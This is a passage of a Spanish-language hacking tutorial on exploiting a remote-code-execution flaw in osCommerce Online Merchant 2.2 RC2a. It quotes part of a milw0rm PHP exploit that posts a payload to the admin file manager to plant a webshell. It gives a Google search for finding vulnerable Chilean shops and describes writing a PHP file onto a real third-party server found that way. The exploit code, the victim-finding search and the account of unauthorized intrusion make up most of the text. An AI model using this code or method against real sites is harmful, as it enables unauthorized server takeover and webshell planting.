La vulnerabilidad que usare ya es muy conocida es un RCE* exploit, pero en este caso no utilizare el exploit, tratare de hacerlo manualmente ;)
El source code lo encontramos en milw0rm.com
http://www.milw0rm.com/exploits/9556
Pero como mencionaba antes solo no usare este exploit, en resumen el fallo consiste en una ejecucion remota de archivos, la que nos permite crear un archivo arbitrario.";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
# milw0rm.com [2009-08-31]
Buscando Servidores Vulnerables:
Como ya sabemos goOglear buscaremos el cms afectado.
"site:.cl" + "powered by oscommerce" "2009 -2010" Página 3 de aproximadamente 40,700 resultados (0.27 segundos)
Ubicamos un server vulnerable a osCommerce Online Merchant v2.2 RC2a
Ahora si estamos en windows podriamos usar Telnet para hacer una coneccion entre la web y nosotros, en este caso usare algo mas practico Burp Suite, es un framework muy completo para hacer audicion, pentesting etc, en este caso solo usare la version gratuita que se puede descargar desde su web:
http://portswigger.net/suite/download2.html
usando los mismos parametros del exploit rce eh creado un archivo .php sin ninguna restriccion en el cual puse un simple comando para mostrar el php.ini y mostrar informacion relevante del servidor, un atacante mal intencionado podria ejecutar codigo arbitrariamente y obetener acceso al sistema mediante una php-shell.